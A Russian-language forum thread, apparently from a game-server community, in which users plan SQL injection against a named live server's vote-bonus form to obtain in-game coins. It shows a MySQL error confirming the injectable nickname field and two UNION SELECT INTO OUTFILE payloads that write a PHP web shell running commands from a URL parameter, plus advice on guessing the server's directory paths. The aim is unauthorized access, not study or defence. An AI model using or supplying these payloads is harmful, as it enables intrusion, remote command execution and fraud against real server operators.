[Уязвимость] Мысли по поводу приза за голосование...

[dager315]

Так как я начал изучать SQL Injection. Меня это наталкнуло на идею... Как через иньекцию получить заветные монетки... Ну что же начну рассказывать суть идеи...

Так как иньекция проводиться не только через адресную строку, но и в других полях ввода... На пример вход в личный кабинет или ввод ника для получения бонуса, я попытался провести мнъекцию... Но в связи не хваткой опыта процес встал в штыки... Для теста я решил использовать некий сервер ... Стрёмненький такой сервачок грация финал... Заходя на страцицу получения бонуса я поочерёдно начал вставлять произвольные не матиматические символы... Так вот после нескольких попыток я ввёл ковычку в конце ника... Вышло сообщение об ошибке синтаксиса...

Код:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''AxE'' LIMIT 1' at line 1
1

Так же если вставлять ковычку в начало то после неё сервер не читает текст...

Так вот я подумал... Что если вставлять некие команды в в конце ника... Но так как я не знаю не php не mysql а учить их меня ломает, на этом я заступрился... Давайте продвигать тему...

[CeDou]

Цитата: Сообщение от dager315 Так как я начал изучать SQL Injection. Меня это наталкнуло на идею... Как через иньекцию получить заветные монетки... Ну что же начну рассказывать суть идеи... Так как иньекция проводиться не только через адресную строку, но и в других полях ввода... На пример вход в личный кабинет или ввод ника для получения бонуса, я попытался провести мнъекцию... Но в связи не хваткой опыта процес встал в штыки... Для теста я решил использовать некий сервер ... Стрёмненький такой сервачок грация финал... Заходя на страцицу получения бонуса я поочерёдно начал вставлять произвольные не матиматические символы... Так вот после нескольких попыток я ввёл ковычку в конце ника... Вышло сообщение об ошибке синтаксиса... Код: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''AxE'' LIMIT 1' at line 1 1 Так же если вставлять ковычку в начало то после неё сервер не читает текст... Так вот я подумал... Что если вставлять некие команды в в конце ника... Но так как я не знаю не php не mysql а учить их меня ломает, на этом я заступрился... Давайте продвигать тему...

с mysql знаком, что за сервачек для теста, я что нить на нем поэксперементирую и поотписываю в тему.
Таким способом можно провести sql-инжект, но кроме как получения инфы из таблиц я не вижу.

[dager315]

Сервак l2fl.org...

[CeDou]

помоему тут фильтрация

хотя...

если подобрать путь, можно заюзать это
pirat'union select '<?php passthru($_GET["cmd"]); ?>' into outfile '/httpd/www/html/class.php'#

pirat'union select '<?php passthru($_GET["cmd"]); ?>' into outfile '/l2fl.org/vote/class.php'#

У тебя какие продвижения?

[dager315]

Абсольтно никаких... А как обычно подбирают директорию???

[CeDou]

Цитата: Сообщение от dager315 Абсольтно никаких... А как обычно подбирают директорию???

можно помучать запросами, тогда само выдаст пути.
но можно и методом подбора,что гораздо неудобнее

[dager315]

Если так судить то по любому в директории будет стоять папка /skripts/ или /l2top/...